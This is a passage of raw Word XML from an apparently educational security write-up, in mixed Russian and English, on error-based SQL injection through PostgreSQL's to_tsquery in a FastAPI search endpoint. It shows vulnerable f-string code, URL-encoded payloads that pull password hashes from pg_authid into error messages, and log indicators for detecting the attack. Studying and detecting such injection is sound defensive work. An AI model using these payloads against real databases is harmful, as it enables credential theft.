        <w:t xml:space="preserve"> SQL inj в первый аргумент `to_tsquery`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3841ABF3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сценарий: код использует bind для основной части, но dynamic prefix для language:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6E679D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0889D6D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B02CF2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query(""),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D263CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    config: str = Query("english"),  # user-controlled config name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134AF495" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D95B472" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33385BB9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Антипаттерн: dynamic config через f-string + bind для q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142387AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3218A58E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76940AC7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE search_vector @@ to_tsquery('{config}', :q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286E7E76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F64C9C"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 {"q": q})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E5CB0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAB650D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>GET /search?q=hello&amp;config=english'%20%7C%7C%20(SELECT%20rolpassword%20FROM%20pg_authid%20WHERE%20rolname=current_user)%20%7C%7C%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C506775" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>config = "english' || (SELECT rolpassword FROM pg_authid WHERE rolname=current_user) || '"</w:t>
      </w:r>
      <w:r>
        <w:t>. Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739DD522" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09066D32" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE search_vector @@ to_tsquery('english' || (SELECT rolpassword FROM pg_authid WHERE rolname=current_user) || '', :q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5697C3BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL evaluates concat first: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'english' || 'SCRAM-SHA-256$4096:...' || ''</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"englishSCRAM-SHA-256$4096:..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>невалидное config-name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер отвечает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173D5327" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: text search configuration "englishSCRAM-SHA-256$4096:abc..." does not exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ABADB3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP-500 с config-name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>полностью содержащим extracted password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>error-based extraction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через regconfig-cast в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23337E27" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Альтернативно, если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> концатенируется (а не bind):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097B54A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query = text(f"... to_tsquery('english', '{q}') ...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6AF370" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310A040D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /search?q=hello%27%20||%20(SELECT%20rolpassword%20FROM%20pg_authid%20LIMIT%201)%20||%20%27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684A43EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q = "hello' || (SELECT rolpassword FROM pg_authid LIMIT 1) || '"</w:t>
      </w:r>
      <w:r>
        <w:t>. Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041D002B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery('english', 'hello' || (SELECT rolpassword FROM pg_authid LIMIT 1) || '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679C2B04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Concat выполняется, итог — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'helloSCRAM-SHA-256$...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсит это как один token (содержит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что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не валидные tsquery-chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер отвечает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2B1789" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: syntax error in tsquery: "helloSCRAM-SHA-256$4096:abc..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2932CFDE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Password leaked в error message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5D3D1C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Extraction любого SELECT-доступного значения в response error message. Эффективнее boolean-blind (3.3) — один запрос → один полный value, не побитная extraction. Эффективнее </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-time-based — нет necesidad waiting. Опасность: artefact выглядит как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>обычная application error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, без необычных SQL-конструкций в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (subquery вычислился до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t>, error не содержит full query plan).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFE1D43" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Артефакты атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB54EC2"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query с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(' || (SELECT ...) || ', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(..., ' || (SELECT ...) || ')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — нетипичные concat-patterns в literal-position.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559B43E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_min_messages = error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>syntax error in tsquery: "..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с длинными strings (&gt;50 chars) — индикатор leakage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40884C62" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_min_messages = error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text search configuration "..." does not exist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с подозрительным config-name — Variant B leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E71B2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   HTTP access-log: query parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>config=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</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pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolpassword</w:t>
      </w:r>
      <w:r>
        <w:t>, escape characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080A6372" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Три независимых факта:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1195B494" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`to_tsquery` evaluates input при parsing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. PostgreSQL evaluates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'a' || (SELECT ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>до</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вызова </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t>, потому что это standard SQL expression-evaluation. Subquery result становится частью string-literal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D5307" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`to_tsquery` syntax errors включают input verbatim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Источник в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/backend/utils/adt/tsquery.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: при parser error функция вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ereport(ERROR, (errcode, errmsg("syntax error in tsquery: \"%s\"", input)))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — input копируется в errmsg как есть.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A71566" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application error handler пересылает Postgres error в HTTP response</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. FastAPI default — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
